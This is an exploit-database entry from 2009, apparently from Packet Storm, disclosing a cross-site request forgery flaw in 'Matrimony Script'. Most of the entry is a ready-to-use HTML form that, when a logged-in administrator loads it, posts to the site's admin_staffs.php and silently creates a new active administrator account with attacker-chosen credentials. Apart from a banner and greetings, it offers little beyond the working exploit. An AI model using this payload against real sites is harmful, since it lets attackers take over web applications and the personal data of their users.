Matrimony Script XSRF

2009-12-17T00:00:00
ID PACKETSTORM:83971
Type packetstorm
Reporter bi0
Modified 2009-12-17T00:00:00

Description

                                        
                                            ` ______ __ ______  
/\ == \ /\ \ /\ __ \  
\ \ __< \ \ \ \ \ \/\ \  
\ \_____\ \ \_\ \ \_____\  
\/_____/ \/_/ \/_____/  
  
01000010 01101001 01001111  
  
[#]----------------------------------------------------------------[#]  
#  
# [+] Matrimony Script CSRF Vulnerability  
#  
# // Author Info  
# [x] Author: bi0  
# [x] Contact: bukibv@hotmail.com  
# [x] Thanks: sp1r1t,packetdeath,Zer0flag,redking and all my friends  
# [x] Irc : irc.freenode.net / #security-shell  
# [*] Note : R.I.P Rock4eveR,We`ll never forget you !  
#  
[#]-------------------------------------------------------------------------------------------[#]  
#  
# [x] Exploit :  
#  
# // CSRF to Create new Admin Staff  
#  
#================================================================#  
<html>  
<body>  
<!-- Create new Admin Staff -->  
<form action="http://[server]/admin/admin_staffs.php" method="post">  
<input name="name" type="text" id="name" value="name">  
<input name="username" type="text" class="forminput" id="username" value="user">  
<input name="pass" type="text" id="pass" value="pass">  
<input name="email" type="text" id="email" value="email@somtging.com">  
<input type="hidden" id="status" value="Active" name="status" >  
<input name="Submit" type="submit" class="button" value="Create Staff">  
</body>  
</html>  
#================================================================#  
#  
#  
[#]------------------------------------------------------------------------------------------[#]  
  
  
#EOF  
  
`